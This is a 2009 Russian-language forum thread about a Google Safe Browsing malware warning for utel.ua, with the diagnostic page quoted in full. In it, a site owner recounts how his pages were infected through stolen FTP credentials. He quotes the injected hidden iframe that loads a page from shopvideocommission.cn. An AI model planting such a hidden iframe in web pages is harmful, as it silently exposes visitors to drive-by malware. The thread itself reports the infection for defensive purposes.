Зашел сегодня к ним на сайт, google выдал предупреждающее сообщение, посмотрел детали:
Цитата
Safe Browsing Diagnostic page for utel.ua
What is the current listing status for utel.ua? Site is listed as suspicious - visiting this website may harm your computer.
Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.
What happened when Google visited this site? Of the 4 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-06-24, and the last time suspicious content was found on this site was on 2009-06-24. Malicious software is hosted on 1 domain(s), including shopvideocommission.cn/.
This site was hosted on 1 network(s) including AS6849 (UKRTELNET).
Has this site acted as an intermediary resulting in further distribution of malware? Over the past 90 days, utel.ua did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware? Yes, this site has hosted malicious software over the past 90 days. It infected 2 domain(s), including smssender.org.ua/, devahi.net/.
How did this happen? In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Next steps: Return to the previous page. If you are the owner of this website, you can request a review of your site using GoogleWebmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
Безопасный просмотр Страница диагностики для utel.ua
Занесен ли сайт utel.ua в список подозрительных веб-сайтов?
Сайт занесен в список подозрительных веб-сайтов посещение этого сайта может нанести вред вашему компьютеру.
В некоторой части этого сайта несколько раз (2) за последние 90 дней была замечена подозрительная активность.
Что произошло во время последнего просмотра этого сайта компанией Google?
Из протестированных нами за последние 90 дней страниц данного сайта (4) в загрузке и установке вредоносного программного обеспечения без разрешения пользователя было замечено 2. Последний раз сайт просматривался Google 2009-06-24, а подозрительное содержание было обнаружено 2009-06-24.
Количество доменов, на которых размещается вредоносное ПО, равняется 1, включая shopvideocommission.cn/.
This site was hosted on 1 network(s) including AS6849 (UKRTELNET).
Был ли данный сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?
По всей видимости, за последние 90 дней сайт utel.ua не был промежуточным звеном в заражении других сайтов.
Размещается ли на этом сайте вредоносное программное обеспечение?
Да. За последние 90 дней на этом сайте размещалось вредоносное программное обеспечение. Были заражены некоторые домены (2), включая smssender.org.ua/, devahi.net/.
Как это произошло?
В некоторых случаях третьи лица могут добавить вредоносный код на вполне законные сайты. Предупреждающее сообщение может быть показано нами именно по этой причине.
Имеется информация, что этот сайт атакует компьютеры! Имеется информация о том, что сайт utel.ua используется для атак на компьютеры пользователей. В соответствии с вашими настройками безопасности он был заблокирован. Сайты, атакующие компьютеры, пытаются установить программное обеспечение, которое похищает персональную информацию, вредит вашей системе или использует ваш компьютер для атак на другие компьютеры. Некоторые сайты намеренно созданы для распространения зловредного программного обеспечения, однако многие сайты были взломаны и делают это без ведома или разрешения своих владельцев.
это может из за того что в браузерах кроме ИЕ прописан гугл как поисковая система или что то в этом духе
Ну да, а если зажмуриться, то все вирусы в мире исчезнут? Проблема не в броузере и не в гугле скорее всего, с гуглом однажды произошел глюк, связанный с классификацией большинства сайтов как malware, но сразу поднялся сильный шум. Сейчас такого нет.
Группа: Silver Member
Сообщений: 688
Регистрация: 30.11.05 Авторитет: 32
Вне форума
Предупреждения: (0%)
Цитата(ordruf @ 25 Июня, 2009, 15:22)
Количество доменов, на которых размещается вредоносное ПО, равняется 1, включая shopvideocommission.cn/.
Ого, буквально вчера обнаружил на одном из своих доменов вирусный код в страницых index.php и index.html, там вставлен невидимый iframe, который ведет в том числе и на shopvideocommission.cn: <iframe src="http://shopvideocommission.cn:8080/index.php" width=182 height=149 style="visibility: hidden"></iframe>
Файлы заражались через ftp, видимо украли логин и пароль. Avast ругался, говорил что вирус HTML:Iframe-gen
Есть список адресов атакующих хостов, если нужно, могу выложить
Вывод: использовать только sftp, и не хранить пароли в клиентах.